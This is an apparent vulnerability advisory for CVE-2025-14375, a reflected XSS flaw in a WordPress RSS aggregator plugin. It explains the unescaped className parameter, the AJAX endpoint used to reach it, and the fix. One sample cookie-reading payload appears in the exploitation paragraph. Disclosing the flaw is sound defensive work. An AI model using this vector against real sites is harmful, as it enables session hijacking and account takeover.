CVE-2025-14375: RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging <= 5.0.10 – Reflected Cross-Site Scripting via className (wp-rss-aggregator)

Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 5.0.10
Patched Version 5.0.11
Disclosed January 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14375:
This vulnerability is a reflected cross-site scripting (XSS) flaw in the RSS Aggregator WordPress plugin versions up to 5.0.10. The vulnerability exists in the plugin’s display rendering functionality, specifically through insufficient output escaping of the ‘className’ parameter. Unauthenticated attackers can inject arbitrary JavaScript via crafted links, which executes in victims’ browsers when they visit malicious URLs.

The root cause lies in the wp-rss-aggregator/core/src/Renderer.php file’s parseArgs method. The ‘className’ parameter from user input (line 322) was processed using trim() without proper sanitization before being assigned to display settings. This unsanitized value was then directly output in HTML class attributes within the ListLayout.php file (lines 36 and 47) without escaping via esc_attr(). The vulnerable code paths include the renderDisplay AJAX handler in core/modules/renderer.php and the frontend rendering templates.

Exploitation requires an attacker to craft a URL containing malicious JavaScript in the ‘className’ parameter targeting the plugin’s AJAX endpoint. The attack vector is the /wp-admin/admin-ajax.php endpoint with action=wpra.render.display. A payload like alert(document.cookie) in the className parameter would be reflected in the response HTML without proper escaping, executing when the victim visits the crafted link.

The patch addresses the vulnerability by applying proper input sanitization and output escaping. In Renderer.php line 322, the code now uses sanitize_html_class() on the className parameter instead of trim(). Additionally, in ListLayout.php lines 36 and 47, the plugin now escapes the htmlClass value using esc_attr() before output. The patch also adds nonce verification in core/modules/renderer.php lines 56-61 to prevent CSRF attacks, though this doesn’t directly fix the XSS vulnerability.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of the victim’s WordPress session. This can lead to session hijacking, administrative account takeover, content manipulation, or redirection to malicious sites. The vulnerability requires user interaction (clicking a link) but affects unauthenticated users, making it accessible to low-skill attackers for credential theft and site compromise.
